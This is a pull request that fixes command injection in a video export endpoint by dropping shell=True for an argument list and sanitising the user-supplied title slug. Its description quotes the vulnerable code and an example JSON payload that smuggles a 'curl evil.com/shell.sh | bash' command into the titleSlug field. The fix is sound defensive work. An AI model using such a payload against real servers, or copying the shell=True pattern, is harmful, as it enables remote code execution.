### PR TITLE
fix: prevent command injection in ffmpeg video export

### DIFF
--- a/api/routes/video_rendering.py
+++ b/api/routes/video_rendering.py
@@ -360,21 +360,27 @@ def export_video():
         local_filename = download_video(video_url)
         local_filenames.append(local_filename)
 
-    # Create a list of input file arguments for ffmpeg
-    input_files = " ".join([f"-i {filename}" for filename in local_filenames])
-
     # Generate a unique filename with UNIX timestamp
     timestamp = int(time.time())
+    # Sanitize title_slug to prevent command injection
+    safe_slug = re.sub(r'[^a-zA-Z0-9_-]', '', title_slug or 'untitled')
     merged_filename = os.path.join(
-        os.getcwd(), f"exported-scene-{title_slug}-{timestamp}.mp4"
+        os.getcwd(), f"exported-scene-{safe_slug}-{timestamp}.mp4"
     )
 
-    # Command to merge videos using ffmpeg
-    command = f"ffmpeg {input_files} -filter_complex 'concat=n={len(local_filenames)}:v=1:a=0[out]' -map '[out]' {merged_filename}"
+    # Build ffmpeg command as a list to avoid shell injection
+    command_list = ["ffmpeg"]
+    for filename in local_filenames:
+        command_list.extend(["-i", filename])
+    command_list.extend([
+        "-filter_complex", f"concat=n={len(local_filenames)}:v=1:a=0[out]",
+        "-map", "[out]",
+        merged_filename
+    ])
 
     try:
-        # Execute the ffmpeg command
-        subprocess.run(command, shell=True, check=True)
+        # Execute the ffmpeg command safely (no shell=True)
+        subprocess.run(command_list, check=True)
         print("Videos merged successfully.")
         print(f"merged_filename: {merged_filename}")
         public_url = upload_to_azure_storage(


### PR DESCRIPTION
## Summary

Fix command injection in the video export endpoint by removing `shell=True` and sanitizing user input.

## Problem

The `export_video` function constructs an ffmpeg command using string interpolation with user-controlled data and executes it with `shell=True`:

```python
title_slug = request.json.get("titleSlug")  # user input
merged_filename = f"exported-scene-{title_slug}-{timestamp}.mp4"
input_files = " ".join([f"-i {filename}" for filename in local_filenames])
command = f"ffmpeg {input_files} ... {merged_filename}"
subprocess.run(command, shell=True, check=True)  # RCE!
```

An attacker can inject shell commands via `titleSlug`:
```json
{"titleSlug": ""; curl evil.com/shell.sh | bash; #", "scenes": [...]}
```

Both `title_slug` (line 353) and `local_filenames` (derived from `videoUrl` in line 358) are user-controlled and interpolated into the shell command.

## Fix

1. **Sanitize** `title_slug` with regex allowlist `[a-zA-Z0-9_-]`
2. **Replace** `subprocess.run(command, shell=True)` with `subprocess.run(command_list)` using a list of arguments
3. No shell interpretation means no command injection possible

## Impact

- **Type**: Remote Code Execution via Command Injection (CWE-78)
- **Affected endpoint**: `POST /export_video`
- **Risk**: Arbitrary command execution on the server
- **OWASP**: A03:2021 — Injection